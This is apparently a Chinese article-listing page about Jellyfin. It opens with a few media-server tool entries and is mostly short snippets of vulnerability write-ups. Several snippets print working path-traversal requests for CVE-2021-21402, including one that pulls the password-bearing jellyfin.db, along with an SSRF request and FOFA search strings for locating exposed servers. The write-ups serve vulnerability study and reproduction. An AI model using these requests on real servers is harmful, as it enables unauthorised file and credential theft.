Tissue,一个让你告别凌乱教材(自行体会😊)、轻松构建个人学习库的神奇工具!它能够自动下载海报、匹配元数据,让你的教材在Jellyfin、Emby、Kodi等媒体服务器软件中,像书籍一样整齐排列,...
Tube Archivist:一款自托管的油管媒体管理器,支持下载视频和添加到Jellyfin
随着你的油管视频收藏不断增多,查找特定视频可能会变得困难。这就是Tube Archivist发挥作用的地方:通过从油管获取元数据来索引你收藏的视频,你可以方便地通过一个简洁的网页界面离线管理和搜索你存...
docker搭建jellyfin部署视频库、私人电视
自述giegie,我没有群晖nas怎么办?哈!你小呆呆啊,这不有树莓派、电脑、手机么你真以为电视盒子不是装了一套嵌入式系统而已啊(如今的电视也嵌入了系统)把你废旧的设备拿出来,又是一台新功能的电视了再...
Jellyfin 任意文件读取漏洞(CVE-2021-21402)
fofa语句:title="Jellyfin"我们随便点一个进入接着我们使用POCGET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows...
经典Jellyfin 任意文件读取
术之尽头,炁体源流构造payload:/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/漏洞证明文笔生疏,...
Jellyfin SSRF
无善无恶心之体,有善有恶意之动,知善知恶是良知,为善去恶是格物构造请求POC:http://xxx/Images/Remote?imageUrl=https://www.baidu.com漏洞证明:文...
关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习
漏洞描述:Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。环境及部署说明...
Jellyfin - CVE-2021-21402 任意文件读取漏洞
漏洞背景 Jellyfin允许读取未经身份验证的任意文件漏洞复现祭出fofa关键字title="jellyfin" 有条件的排除蜜罐漏洞利用可以读取未经身份验证的任意文件/Audio/{Id...
Jellyfin任意文件读取复现
Jellyfin任意文件读取复现POC:GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anyt...
Jellyfin任意文件读取漏洞(CVE-2021-21402)
漏洞简介 Jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品,它通过多...
CVE-2021-21402 Jellyfin任意文件读取
FOFA:title="Jellyfin"影响版本:jellyfin<=10.7.0POC1:从服务器下载带有密码的jellyfin.db:GET /Audio/anything/hls/..%...